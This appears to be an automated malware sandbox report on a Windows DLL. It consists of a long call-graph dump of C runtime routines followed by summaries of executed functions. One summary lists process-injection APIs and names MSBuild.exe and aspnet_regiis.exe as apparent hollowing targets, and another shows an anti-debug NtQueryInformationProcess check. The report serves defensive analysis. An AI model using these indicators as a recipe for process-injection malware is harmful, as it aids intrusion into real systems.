6d5d3430 __freea 14 API calls 11734->11737 11738 6d5d6027 11735->11738 11739 6d5d3430 __freea 14 API calls 11735->11739 11736->11733 11736->11734 11737->11735 11740 6d5d6039 11738->11740 11742 6d5d3430 __freea 14 API calls 11738->11742 11739->11738 11741 6d5d604b 11740->11741 11743 6d5d3430 __freea 14 API calls 11740->11743 11744 6d5d605d 11741->11744 11745 6d5d3430 __freea 14 API calls 11741->11745 11742->11740 11743->11741 11746 6d5d606f 11744->11746 11747 6d5d3430 __freea 14 API calls 11744->11747 11745->11744 11748 6d5d6081 11746->11748 11750 6d5d3430 __freea 14 API calls 11746->11750 11747->11746 11749 6d5d6093 11748->11749 11751 6d5d3430 __freea 14 API calls 11748->11751 11752 6d5d60a5 11749->11752 11753 6d5d3430 __freea 14 API calls 11749->11753 11750->11748 11751->11749 11754 6d5d3430 __freea 14 API calls 11752->11754 11752->11755 11753->11752 11754->11755 11755->11705 11757 6d5d60c8 11756->11757 11758 6d5d6120 11756->11758 11759 6d5d60d8 11757->11759 11760 6d5d3430 __freea 14 API calls 11757->11760 11758->11707 11761 6d5d60ea 11759->11761 11762 6d5d3430 __freea 14 API calls 11759->11762 11760->11759 11763 6d5d60fc 11761->11763 11764 6d5d3430 __freea 14 API calls 11761->11764 11762->11761 11765 6d5d610e 11763->11765 11766 6d5d3430 __freea 14 API calls 11763->11766 11764->11763 11765->11758 11767 6d5d3430 __freea 14 API calls 11765->11767 11766->11765 11767->11758 11769 6d5d5e3d 11768->11769 11770 6d5d5e1e 11768->11770 11769->11726 11770->11769 11774 6d5d6149 11770->11774 11773 6d5d3430 __freea 14 API calls 11773->11769 11775 6d5d5e37 11774->11775 11776 6d5d615a 11774->11776 11775->11773 11810 6d5d6124 11776->11810 11779 6d5d6124 _unexpected 14 API calls 11780 6d5d616d 11779->11780 11781 6d5d6124 _unexpected 14 API calls 11780->11781 11782 6d5d6178 11781->11782 11783 6d5d6124 _unexpected 14 API calls 11782->11783 11784 6d5d6183 11783->11784 11785 6d5d6124 _unexpected 14 API calls 11784->11785 11786 6d5d6191 11785->11786 11787 6d5d3430 __freea 14 API calls 11786->11787 11788 6d5d619c 11787->11788 11789 6d5d3430 __freea 14 API calls 11788->11789 11790 6d5d61a7 11789->11790 11791 6d5d3430 __freea 14 API calls 11790->11791 11792 6d5d61b2 11791->11792 11793 6d5d6124 _unexpected 14 API calls 11792->11793 11794 6d5d61c0 11793->11794 11795 6d5d6124 _unexpected 14 API calls 11794->11795 11796 6d5d61ce 11795->11796 11797 6d5d6124 _unexpected 14 API calls 11796->11797 11798 6d5d61df 11797->11798 11799 6d5d6124 _unexpected 14 API calls 11798->11799 11800 6d5d61ed 11799->11800 11801 6d5d6124 _unexpected 14 API calls 11800->11801 11802 6d5d61fb 11801->11802 11803 6d5d3430 __freea 14 API calls 11802->11803 11804 6d5d6206 11803->11804 11805 6d5d3430 __freea 14 API calls 11804->11805 11806 6d5d6211 11805->11806 11807 6d5d3430 __freea 14 API calls 11806->11807 11808 6d5d621c 11807->11808 11809 6d5d3430 __freea 14 API calls 11808->11809 11809->11775 11812 6d5d6136 11810->11812 11811 6d5d6145 11811->11779 11812->11811 11813 6d5d3430 __freea 14 API calls 11812->11813 11813->11812 11814->11699 11854 6d5d52b6 11815->11854 11818 6d5d53cd 11819 6d5d53d9 ___scrt_is_nonwritable_in_current_image 11818->11819 11820 6d5d3108 __dosmaperr 14 API calls 11819->11820 11821 6d5d5429 11819->11821 11823 6d5d543b __CreateFrameInfo 11819->11823 11828 6d5d540a __CreateFrameInfo 11819->11828 11820->11828 11822 6d5d3553 __dosmaperr 14 API calls 11821->11822 11824 6d5d542e 11822->11824 11825 6d5d5471 __CreateFrameInfo 11823->11825 11868 6d5d3383 EnterCriticalSection 11823->11868 11865 6d5d1b98 11824->11865 11830 6d5d54ae 11825->11830 11831 6d5d55ab 11825->11831 11841 6d5d54dc 11825->11841 11828->11821 11828->11823 11844 6d5d5413 11828->11844 11830->11841 11869 6d5d2fb7 GetLastError 11830->11869 11833 6d5d55b6 11831->11833 11900 6d5d33cb LeaveCriticalSection 11831->11900 11834 6d5d2216 __CreateFrameInfo 21 API calls 11833->11834 11836 6d5d55be 11834->11836 11838 6d5d2fb7 _unexpected 39 API calls 11842 6d5d5531 11838->11842 11840 6d5d2fb7 _unexpected 39 API calls 11840->11841 11896 6d5d5557 11841->11896 11843 6d5d2fb7 _unexpected 39 API calls 11842->11843 11842->11844 11843->11844 11844->11615 11846 6d5d19b8 __CreateFrameInfo std::bad_exception::bad_exception 11845->11846 11847 6d5d19e4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11846->11847 11848 6d5d1ab5 __CreateFrameInfo 11847->11848 11965 6d5cd100 11848->11965 11850 6d5d1ad3 11850->11618 11973 6d5d2053 11851->11973 11855 6d5d52c2 ___scrt_is_nonwritable_in_current_image 11854->11855 11860 6d5d3383 EnterCriticalSection 11855->11860 11857 6d5d52d0 11861 6d5d5312 11857->11861 11860->11857 11864 6d5d33cb LeaveCriticalSection 11861->11864 11863 6d5d2af0 11863->11615 11863->11818 11864->11863 11901 6d5d1ae4 11865->11901 11868->11825 11870 6d5d2fcd 11869->11870 11871 6d5d2fd3 11869->11871 11872 6d5d4e6c _unexpected 6 API calls 11870->11872 11873 6d5d4eab _unexpected 6 API calls 11871->11873 11875 6d5d2fd7 SetLastError 11871->11875 11872->11871 11874 6d5d2fef 11873->11874 11874->11875 11877 6d5d3566 _unexpected 14 API calls 11874->11877 11879 6d5d306c 11875->11879 11880 6d5d3067 11875->11880 11878 6d5d3004 11877->11878 11882 6d5d301d 11878->11882 11883 6d5d300c 11878->11883 11881 6d5d2aeb CallUnexpected 37 API calls 11879->11881 11880->11840 11884 6d5d3071 11881->11884 11886 6d5d4eab _unexpected 6 API calls 11882->11886 11885 6d5d4eab _unexpected 6 API calls 11883->11885 11888 6d5d301a 11885->11888 11887 6d5d3029 11886->11887 11889 6d5d302d 11887->11889 11890 6d5d3044 11887->11890 11892 6d5d3430 __freea 14 API calls 11888->11892 11891 6d5d4eab _unexpected 6 API calls 11889->11891 11893 6d5d2db9 _unexpected 14 API calls 11890->11893 11891->11888 11892->11875 11894 6d5d304f 11893->11894 11895 6d5d3430 __freea 14 API calls 11894->11895 11895->11875 11897 6d5d555b 11896->11897 11898 6d5d5523 11896->11898 11964 6d5d33cb LeaveCriticalSection 11897->11964 11898->11838 11898->11842 11898->11844 11900->11833 11902 6d5d1af6 ___std_exception_copy 11901->11902 11907 6d5d1b1b 11902->11907 11904 6d5d1b0e 11918 6d5d18d4 11904->11918 11908 6d5d1b2b 11907->11908 11909 6d5d1b32 11907->11909 11924 6d5d1939 GetLastError 11908->11924 11911 6d5d1b40 11909->11911 11928 6d5d1910 11909->11928 11911->11904 11913 6d5d1b67 11913->11911 11931 6d5d1bc5 IsProcessorFeaturePresent 11913->11931 11915 6d5d1b97 11916 6d5d1ae4 ___std_exception_copy 39 API calls 11915->11916 11917 6d5d1ba4 11916->11917 11917->11904 11919 6d5d18e0 11918->11919 11920 6d5d18f7 11919->11920 11957 6d5d197f 11919->11957 11922 6d5d190a 11920->11922 11923 6d5d197f ___std_exception_copy 39 API calls 11920->11923 11922->11844 11923->11922 11925 6d5d1952 11924->11925 11935 6d5d31b9 11925->11935 11929 6d5d191b GetLastError SetLastError 11928->11929 11930 6d5d1934 11928->11930 11929->11913 11930->11913 11932 6d5d1bd1 11931->11932 11933 6d5d199c __CreateFrameInfo 8 API calls 11932->11933 11934 6d5d1be6 GetCurrentProcess TerminateProcess 11933->11934 11934->11915 11936 6d5d31cc 11935->11936 11940 6d5d31d2 11935->11940 11938 6d5d4e6c _unexpected 6 API calls 11936->11938 11937 6d5d4eab _unexpected 6 API calls 11939 6d5d31ec 11937->11939 11938->11940 11941 6d5d3566 _unexpected 14 API calls 11939->11941 11956 6d5d196a SetLastError 11939->11956 11940->11937 11940->11956 11942 6d5d31fc 11941->11942 11943 6d5d3219 11942->11943 11944 6d5d3204 11942->11944 11946 6d5d4eab _unexpected 6 API calls 11943->11946 11945 6d5d4eab _unexpected 6 API calls 11944->11945 11948 6d5d3210 11945->11948 11947 6d5d3225 11946->11947 11949 6d5d3229 11947->11949 11950 6d5d3238 11947->11950 11953 6d5d3430 __freea 14 API calls 11948->11953 11951 6d5d4eab _unexpected 6 API calls 11949->11951 11952 6d5d2db9 _unexpected 14 API calls 11950->11952 11951->11948 11954 6d5d3243 11952->11954 11953->11956 11955 6d5d3430 __freea 14 API calls 11954->11955 11955->11956 11956->11909 11958 6d5d1989 11957->11958 11959 6d5d1992 11957->11959 11960 6d5d1939 ___std_exception_copy 16 API calls 11958->11960 11959->11920 11961 6d5d198e 11960->11961 11961->11959 11962 6d5d2aeb CallUnexpected 39 API calls 11961->11962 11963 6d5d199b 11962->11963 11964->11898 11966 6d5cd108 11965->11966 11967 6d5cd109 IsProcessorFeaturePresent 11965->11967 11966->11850 11969 6d5cd514 11967->11969 11972 6d5cd4d7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11969->11972 11971 6d5cd5f7 11971->11850 11972->11971 11974 6d5d2080 11973->11974 11975 6d5d2091 11973->11975 11984 6d5d211b GetModuleHandleW 11974->11984 11991 6d5d1f1d 11975->11991 11980 6d5d20cf 11985 6d5d2085 11984->11985 11985->11975 11986 6d5d2176 GetModuleHandleExW 11985->11986 11987 6d5d21b5 GetProcAddress 11986->11987 11988 6d5d21c9 11986->11988 11987->11988 11989 6d5d21dc FreeLibrary 11988->11989 11990 6d5d21e5 11988->11990 11989->11990 11990->11975 11992 6d5d1f29 ___scrt_is_nonwritable_in_current_image 11991->11992 12006 6d5d3383 EnterCriticalSection 11992->12006 11994 6d5d1f33 12007 6d5d1f6b 11994->12007 11996 6d5d1f40 12011 6d5d1f5e 11996->12011 11999 6d5d20ea 12035 6d5d215d 11999->12035 12001 6d5d20f4 12002 6d5d2108 12001->12002 12003 6d5d20f8 GetCurrentProcess TerminateProcess 12001->12003 12004 6d5d2176 __CreateFrameInfo 3 API calls 12002->12004 12003->12002 12005 6d5d2110 ExitProcess 12004->12005 12006->11994 12008 6d5d1f77 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 12007->12008 12010 6d5d1fdb __CreateFrameInfo 12008->12010 12014 6d5d286a 12008->12014 12010->11996 12034 6d5d33cb LeaveCriticalSection 12011->12034 12013 6d5d1f4c 12013->11980 12013->11999 12015 6d5d2876 __EH_prolog3 12014->12015 12018 6d5d2735 12015->12018 12017 6d5d289d __DllMainCRTStartup@12 12017->12010 12019 6d5d2741 ___scrt_is_nonwritable_in_current_image 12018->12019 12026 6d5d3383 EnterCriticalSection 12019->12026 12021 6d5d274f 12027 6d5d2790 12021->12027 12026->12021 12028 6d5d275c 12027->12028 12029 6d5d27af 12027->12029 12031 6d5d2784 12028->12031 12029->12028 12030 6d5d3430 __freea 14 API calls 12029->12030 12030->12028 12032 6d5d33cb __CreateFrameInfo LeaveCriticalSection 12031->12032 12033 6d5d276d 12032->12033 12033->12017 12034->12013 12038 6d5d348f 12035->12038 12037 6d5d2162 __CreateFrameInfo 12037->12001 12039 6d5d349e __CreateFrameInfo 12038->12039 12040 6d5d34ab 12039->12040 12042 6d5d4d8f 12039->12042 12040->12037 12043 6d5d4d0a _unexpected 5 API calls 12042->12043 12044 6d5d4dab 12043->12044 12044->12040 12046 6d5d44f9 ___scrt_is_nonwritable_in_current_image 12045->12046 12047 6d5d4513 12046->12047 12089 6d5d3383 EnterCriticalSection 12046->12089 12049 6d5d43c2 12047->12049 12052 6d5d2aeb CallUnexpected 39 API calls 12047->12052 12056 6d5d411f 12049->12056 12050 6d5d454f 12090 6d5d456c 12050->12090 12054 6d5d458c 12052->12054 12053 6d5d4523 12053->12050 12055 6d5d3430 __freea 14 API calls 12053->12055 12055->12050 12094 6d5d3c23 12056->12094 12059 6d5d4140 GetOEMCP 12062 6d5d4169 12059->12062 12060 6d5d4152 12061 6d5d4157 GetACP 12060->12061 12060->12062 12061->12062 12062->11568 12063 6d5d33e2 12062->12063 12064 6d5d3420 12063->12064 12065 6d5d33f0 _unexpected 12063->12065 12067 6d5d3553 __dosmaperr 14 API calls 12064->12067 12065->12064 12066 6d5d340b HeapAlloc 12065->12066 12069 6d5d1cb5 _unexpected 2 API calls 12065->12069 12066->12065 12068 6d5d341e 12066->12068 12067->12068 12068->11571 12068->11572 12069->12065 12071 6d5d411f 41 API calls 12070->12071 12072 6d5d4608 12071->12072 12073 6d5d470d 12072->12073 12075 6d5d4645 IsValidCodePage 12072->12075 12080 6d5d4660 std::bad_exception::bad_exception 12072->12080 12074 6d5cd100 CatchGuardHandler 5 API calls 12073->12074 12076 6d5d442f 12074->12076 12075->12073 12077 6d5d4657 12075->12077 12076->11576 12076->11582 12078 6d5d4680 GetCPInfo 12077->12078 12077->12080 12078->12073 12078->12080 12137 6d5d41f3 12080->12137 12082 6d5d401d ___scrt_is_nonwritable_in_current_image 12081->12082 12223 6d5d3383 EnterCriticalSection 12082->12223 12084 6d5d4027 12224 6d5d405e 12084->12224 12089->12053 12093 6d5d33cb LeaveCriticalSection 12090->12093 12092 6d5d4573 12092->12047 12093->12092 12095 6d5d3c3a 12094->12095 12096 6d5d3c41 12094->12096 12095->12059 12095->12060 12096->12095 12097 6d5d2fb7 _unexpected 39 API calls 12096->12097 12098 6d5d3c62 12097->12098 12102 6d5d5a0d 12098->12102 12103 6d5d3c78 12102->12103 12104 6d5d5a20 12102->12104 12106 6d5d5a6b 12103->12106 12104->12103 12110 6d5d5eec 12104->12110 12107 6d5d5a7e 12106->12107 12108 6d5d5a93 12106->12108 12107->12108 12132 6d5d45d5 12107->12132 12108->12095 12111 6d5d5ef8 ___scrt_is_nonwritable_in_current_image 12110->12111 12112 6d5d2fb7 _unexpected 39 API calls 12111->12112 12113 6d5d5f01 12112->12113 12114 6d5d5f47 12113->12114 12123 6d5d3383 EnterCriticalSection 12113->12123 12114->12103 12116 6d5d5f1f 12124 6d5d5f6d 12116->12124 12121 6d5d2aeb CallUnexpected 39 API calls 12122 6d5d5f6c 12121->12122 12123->12116 12125 6d5d5f30 12124->12125 12126 6d5d5f7b _unexpected 12124->12126 12128 6d5d5f4c 12125->12128 12126->12125 12127 6d5d5ca0 _unexpected 14 API calls 12126->12127 12127->12125 12131 6d5d33cb LeaveCriticalSection 12128->12131 12130 6d5d5f43 12130->12114 12130->12121 12131->12130 12133 6d5d2fb7 _unexpected 39 API calls 12132->12133 12134 6d5d45da 12133->12134 12135 6d5d44ed ___scrt_uninitialize_crt 39 API calls 12134->12135 12136 6d5d45e5 12135->12136 12136->12108 12138 6d5d421b GetCPInfo 12137->12138 12139 6d5d42e4 12137->12139 12138->12139 12144 6d5d4233 12138->12144 12141 6d5cd100 CatchGuardHandler 5 API calls 12139->12141 12143 6d5d4396 12141->12143 12143->12073 12148 6d5d622d 12144->12148 12147 6d5d6be3 43 API calls 12147->12139 12149 6d5d3c23 39 API calls 12148->12149 12150 6d5d624d 12149->12150 12168 6d5d4987 12150->12168 12152 6d5d6309 12154 6d5cd100 CatchGuardHandler 5 API calls 12152->12154 12153 6d5d6301 12171 6d5d632e 12153->12171 12157 6d5d429b 12154->12157 12155 6d5d627a 12155->12152 12155->12153 12156 6d5d33e2 15 API calls 12155->12156 12159 6d5d629f __alloca_probe_16 std::bad_exception::bad_exception 12155->12159 12156->12159 12163 6d5d6be3 12157->12163 12159->12153 12160 6d5d4987 ___scrt_uninitialize_crt MultiByteToWideChar 12159->12160 12161 6d5d62e8 12160->12161 12161->12153 12162 6d5d62ef GetStringTypeW 12161->12162 12162->12153 12164 6d5d3c23 39 API calls 12163->12164 12165 6d5d6bf6 12164->12165 12177 6d5d69f4 12165->12177 12175 6d5d48ef 12168->12175 12172 6d5d634b 12171->12172 12173 6d5d633a 12171->12173 12172->12152 12173->12172 12174 6d5d3430 __freea 14 API calls 12173->12174 12174->12172 12176 6d5d4900 MultiByteToWideChar 12175->12176 12176->12155 12178 6d5d6a0f 12177->12178 12179 6d5d4987 ___scrt_uninitialize_crt MultiByteToWideChar 12178->12179 12182 6d5d6a53 12179->12182 12180 6d5d6bce 12181 6d5cd100 CatchGuardHandler 5 API calls 12180->12181 12183 6d5d42bc 12181->12183 12182->12180 12184 6d5d33e2 15 API calls 12182->12184 12186 6d5d6a79 __alloca_probe_16 12182->12186 12197 6d5d6b21 12182->12197 12183->12147 12184->12186 12185 6d5d632e __freea 14 API calls 12185->12180 12187 6d5d4987 ___scrt_uninitialize_crt MultiByteToWideChar 12186->12187 12186->12197 12188 6d5d6ac2 12187->12188 12188->12197 12205 6d5d4f38 12188->12205 12191 6d5d6af8 12196 6d5d4f38 6 API calls 12191->12196 12191->12197 12192 6d5d6b30 12193 6d5d6bb9 12192->12193 12194 6d5d33e2 15 API calls 12192->12194 12198 6d5d6b42 __alloca_probe_16 12192->12198 12195 6d5d632e __freea 14 API calls 12193->12195 12194->12198 12195->12197 12196->12197 12197->12185 12198->12193 12199 6d5d4f38 6 API calls 12198->12199 12200 6d5d6b85 12199->12200 12200->12193 12211 6d5d4a41 12200->12211 12202 6d5d6b9f 12202->12193 12203 6d5d6ba8 12202->12203 12204 6d5d632e __freea 14 API calls 12203->12204 12204->12197 12214 6d5d4c0b 12205->12214 12209 6d5d4f89 LCMapStringW 12210 6d5d4f49 12209->12210 12210->12191 12210->12192 12210->12197 12213 6d5d4a54 ___scrt_uninitialize_crt 12211->12213 12212 6d5d4a92 WideCharToMultiByte 12212->12202 12213->12212 12215 6d5d4d0a _unexpected 5 API calls 12214->12215 12216 6d5d4c21 12215->12216 12216->12210 12217 6d5d4f95 12216->12217 12220 6d5d4c25 12217->12220 12219 6d5d4fa0 12219->12209 12221 6d5d4d0a _unexpected 5 API calls 12220->12221 12222 6d5d4c3b 12221->12222 12222->12219 12223->12084 12234 6d5d47ed 12224->12234 12226 6d5d4080 12227 6d5d47ed 39 API calls 12226->12227 12228 6d5d409f 12227->12228 12229 6d5d4034 12228->12229 12230 6d5d3430 __freea 14 API calls 12228->12230 12231 6d5d4052 12229->12231 12230->12229 12248 6d5d33cb LeaveCriticalSection 12231->12248 12233 6d5d4040 12233->11580 12235 6d5d47fe 12234->12235 12239 6d5d47fa __InternalCxxFrameHandler 12234->12239 12236 6d5d4805 12235->12236 12240 6d5d4818 std::bad_exception::bad_exception 12235->12240 12237 6d5d3553 __dosmaperr 14 API calls 12236->12237 12238 6d5d480a 12237->12238 12241 6d5d1b98 ___std_exception_copy 39 API calls 12238->12241 12239->12226 12240->12239 12242 6d5d484f 12240->12242 12243 6d5d4846 12240->12243 12241->12239 12242->12239 12245 6d5d3553 __dosmaperr 14 API calls 12242->12245 12244 6d5d3553 __dosmaperr 14 API calls 12243->12244 12246 6d5d484b 12244->12246 12245->12246 12247 6d5d1b98 ___std_exception_copy 39 API calls 12246->12247 12247->12239 12248->12233 12250 6d5d2a9f 12249->12250 12251 6d5d2aad 12249->12251 12250->12251 12256 6d5d2ac5 12250->12256 12252 6d5d3553 __dosmaperr 14 API calls 12251->12252 12253 6d5d2ab5 12252->12253 12255 6d5d1b98 ___std_exception_copy 39 API calls 12253->12255 12254 6d5d2abf 12254->11521 12255->12254 12256->12254 12257 6d5d3553 __dosmaperr 14 API calls 12256->12257 12257->12253 12259 6d5d2687 12258->12259 12263 6d5d2658 12258->12263 12260 6d5d269e 12259->12260 12261 6d5d3430 __freea 14 API calls 12259->12261 12262 6d5d3430 __freea 14 API calls 12260->12262 12261->12259 12262->12263 12263->11532 12697 6d5cd4b4 12698 6d5cd4bd 12697->12698 12699 6d5cd4c2 12697->12699 12718 6d5cd698 12698->12718 12703 6d5cd37e 12699->12703 12705 6d5cd38a ___scrt_is_nonwritable_in_current_image 12703->12705 12704 6d5cd399 12705->12704 12706 6d5cd3b3 dllmain_raw 12705->12706 12707 6d5cd3ae 12705->12707 12706->12704 12708 6d5cd3cd dllmain_crt_dispatch 12706->12708 12709 6d5c22c0 __DllMainCRTStartup@12 5 API calls 12707->12709 12708->12704 12708->12707 12710 6d5cd3ee 12709->12710 12711 6d5cd41f 12710->12711 12713 6d5c22c0 __DllMainCRTStartup@12 5 API calls 12710->12713 12711->12704 12712 6d5cd428 dllmain_crt_dispatch 12711->12712 12712->12704 12714 6d5cd43b dllmain_raw 12712->12714 12715 6d5cd406 12713->12715 12714->12704 12716 6d5cd2ce __DllMainCRTStartup@12 86 API calls 12715->12716 12717 6d5cd414 dllmain_raw 12716->12717 12717->12711 12719 6d5cd6ae 12718->12719 12721 6d5cd6b7 12719->12721 12722 6d5cd64b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12719->12722 12721->12699 12722->12721

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 6D5BABD0 Relevance: 79.0, APIs: 22, Strings: 19, Instructions: 7213injectionmemorythreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$Memory$Write$AllocVirtual$Thread$Context$CloseHandleWow64$CreateReadResume
                                                                                                                                                                              • String ID: =$P$@$AV2VkbmVzZGF5AAAAAAAAAFRodXJzZGF5AAAAAEZyaWRheQAAAAAAAFNhdHVyZGF5AAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAAAAAABKYW51YXJ5AEZlYnJ1YXJ5AAAAAE1hcmNoAAAAQXByaWwAAABKdW5lAAAAAEp1bHkAAAAAQXVndXN0AAAAAAAAU2VwdGVtYmVyAAAAAAAAAE9jdG9iZXIATm9$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$LB8a$MNNW$Q(]Q$R_1E$R_1E$Yo"a$eyM$eyM$kernel32.dll$ntdll.dll$xJU]$xL Q$+wk
                                                                                                                                                                              • API String ID: 167752296-944074378
                                                                                                                                                                              • Opcode ID: 7a2ac431229da6846c71fa0bef69a0985e47fc51744395324c19f63b66c4c732
                                                                                                                                                                              • Instruction ID: 5dd909bb6a1c4a3188cc47e6d38bcaadb5cdfd06e7070ed58e2aa68a83d91735
                                                                                                                                                                              • Opcode Fuzzy Hash: 7a2ac431229da6846c71fa0bef69a0985e47fc51744395324c19f63b66c4c732
                                                                                                                                                                              • Instruction Fuzzy Hash: 75D33472A54655CFCB1CCE7CCEA87E977F1BB86305F009989D406EBB50D6399A888F01
                                                                                                                                                                              Function 6D5B80E0 Relevance: 43.6, APIs: 20, Strings: 4, Instructions: 1555filememoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Handle$Close$File$Module$CreateCurrentProcessProtectViewVirtual$Information
                                                                                                                                                                              • String ID: !;!q$0WS$0WS$@
                                                                                                                                                                              • API String ID: 2283251458-2458510083
                                                                                                                                                                              • Opcode ID: 093e8a777c39545ddb40ffa94e587bd4101b043fc6383d2b3f62916f2b9b8df2
                                                                                                                                                                              • Instruction ID: c7de3464a605723123b0651d1e9192f18b5acdf0f7cfd76ecb25097c53b906d5
                                                                                                                                                                              • Opcode Fuzzy Hash: 093e8a777c39545ddb40ffa94e587bd4101b043fc6383d2b3f62916f2b9b8df2
                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD2CC75A542198FCB08CF3CC8A57EEBBF1BB4A310F109959E419EB794D6359988CF02
                                                                                                                                                                              Function 6D5BA4E0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 343COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1490 6d5ba4e0-6d5ba53b GetModuleHandleW call 6d5b98e0 call 6d5cdea0 1495 6d5ba542-6d5ba54d 1490->1495 1496 6d5ba8ea-6d5ba933 1495->1496 1497 6d5ba553-6d5ba560 1495->1497 1498 6d5ba9e7 1496->1498 1500 6d5ba7e6-6d5ba7f3 1497->1500 1501 6d5ba566-6d5ba573 1497->1501 1498->1495 1500->1498 1503 6d5ba7da-6d5ba7e1 1501->1503 1504 6d5ba579-6d5ba586 1501->1504 1503->1498 1506 6d5ba58c-6d5ba599 1504->1506 1507 6d5ba9e0 1504->1507 1509 6d5ba59f-6d5ba5ac 1506->1509 1510 6d5ba713-6d5ba75c 1506->1510 1507->1498 1512 6d5ba5b2-6d5ba5bf 1509->1512 1513 6d5ba761-6d5ba7d5 1509->1513 1510->1498 1515 6d5ba701-6d5ba70e 1512->1515 1516 6d5ba5c5-6d5ba5d2 1512->1516 1513->1498 1515->1498 1518 6d5ba5d8-6d5ba5e5 1516->1518 1519 6d5ba8cc-6d5ba8d3 1516->1519 1521 6d5ba5eb-6d5ba5f8 1518->1521 1522 6d5ba859-6d5ba8c7 1518->1522 1519->1498 1524 6d5ba80b-6d5ba854 1521->1524 1525 6d5ba5fe-6d5ba60b 1521->1525 1522->1498 1524->1498 1527 6d5ba6b9-6d5ba6fc NtQueryInformationProcess 1525->1527 1528 6d5ba611-6d5ba61e 1525->1528 1527->1498 1530 6d5ba8d8-6d5ba8e5 1528->1530 1531 6d5ba624-6d5ba631 1528->1531 1530->1498 1533 6d5ba7f8-6d5ba806 1531->1533 1534 6d5ba637-6d5ba644 1531->1534 1533->1498 1536 6d5ba64a-6d5ba657 1534->1536 1537 6d5ba938-6d5ba9a6 1534->1537 1539 6d5ba65d-6d5ba66a 1536->1539 1540 6d5ba9c5-6d5ba9cf 1536->1540 1537->1498 1542 6d5ba6a0-6d5ba6b4 1539->1542 1543 6d5ba670-6d5ba67d 1539->1543 1540->1498 1542->1498 1545 6d5ba9ab-6d5ba9c4 call 6d5cd100 1543->1545 1546 6d5ba683-6d5ba690 1543->1546 1549 6d5ba696-6d5ba69b 1546->1549 1550 6d5ba9d4-6d5ba9db 1546->1550 1549->1498 1550->1498
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                              • String ID: Ca6\$NtQueryInformationProcess$ntdll.dll
                                                                                                                                                                              • API String ID: 4139908857-3645646939
                                                                                                                                                                              • Opcode ID: f2b5a0f75455deb592f90d6f6b83c2309a395e0195de1749135b245b32b612ba
                                                                                                                                                                              • Instruction ID: ba0d67163c62cbd84aba96c2ebb58495c1747569c1b6bf5f96c40c812ce476cf
